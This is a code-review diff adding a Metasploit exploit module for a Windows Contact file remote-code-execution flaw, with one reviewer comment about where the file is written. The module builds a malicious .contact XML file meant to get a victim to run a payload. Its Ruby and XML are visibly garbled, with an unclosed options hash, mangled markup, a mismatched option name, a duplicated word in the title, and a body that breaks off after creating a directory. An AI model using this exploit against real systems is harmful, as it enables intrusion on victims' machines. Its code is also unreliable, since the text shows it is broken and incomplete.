modules/exploits/windows/fileformat/microsoft_windows_contact_remote_code_execution.rb

```diff
@@ -0,0 +1,74 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Microsoft Windows CONTACT - Remote Code Execution Execution',
+      'Description' => %q{
+        This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
+        User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
+      },
+      'Author'      =>
+        [ 'John Page (aka hyp3rlinx)', # Vuln discovery
+          'Brenner Little' # MSF module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['EDB', '46188']
+        ],
+      'DisclosureDate' => 'Jan 17 2019', # According to https://www.exploit-db.com/exploits/46188
+      'Privileged'     => false,
+      'Platform'       => 'win',
+      'Payload'        => {
+        'DisableNops' => true
+      },
+      'DefaultOptions' => {
+        'DisablePayloadHandler' => true
+      'Targets'        => [['Windows', { }]],
+      'DefaultTarget'  => 0
+      ))
+      register_options(
+      [
+        OptString.new('FILENAME', [false, 'The name of the malicious payload to execute', 'msf.com']),
+        OptString.new('ContactName', [false, 'The name of the Contact File', 'John Smith'])
+      ])
+  end
+  def exploit
+    require 'fileutils'
+    contactname = "#{datastore['Contactname']}"
+    test = contactname
+    exename = "#{datastore['FILENAME']}"
+    xml = | << ? xml version = "1.0"
+    encoding = "UTF-8" ? >
+    <
+    c : contact c: Version = "1"
+    xmlns: c = "http://schemas.microsoft.com/Contact"
+    xmlns: xsi = "http://www.w3.org/2001/XMLSchema-instance"
+    xmlns: MSP2P = "http://schemas.microsoft.com/Contact/Extended/MSP2P" >
+    <
+    c: CreationDate > 2019 - 03 - 24 T02: 30: 47 Z < /c:CreationDate><c:Extended xsi:nil="true"/ >
+    <
+    c: ContactIDCollection > < c: ContactID c: ElementID = "bfea8bff-d916-4364-915e-0a893b879083" > < c: Value > da3b371c - c7a0 - 48 f0 - b08e - 41 b4cef85f93 < /c:Value></c: ContactID > < /c:ContactIDCollection><c:NameCollection><c:Name c:ElementID="c125e76a-50d9-40b0-aec1-6e4f7f85a648"><c:FormattedName>contact1</c: FormattedName > < c: GivenName > contact1 < /c:GivenName></c: Name > < /c:NameCollection><c:UrlCollection><c:Url c:ElementID="0e5978f5-082b-4ac9-96d0-f275dc4810d5"><c:Value>contact2</c: Value > < c: LabelCollection > < c: Label > Personal < /c:Label></c: LabelCollection > < /c:Url></c: UrlCollection > < c: PhotoCollection > < c: Photo c: ElementID = "48f0096f-a537-4bc9-a025-126163c55fde" > < c: LabelCollection > < c: Label > UserTile < /c:Label></c: LabelCollection > < /c:Photo></c: PhotoCollection > < /c:contact> |
+    FileUtils.mkdir_p test
```

Comment:
The file should not be written to the home directory by default. It should be written to `datastore['FILENAME']`.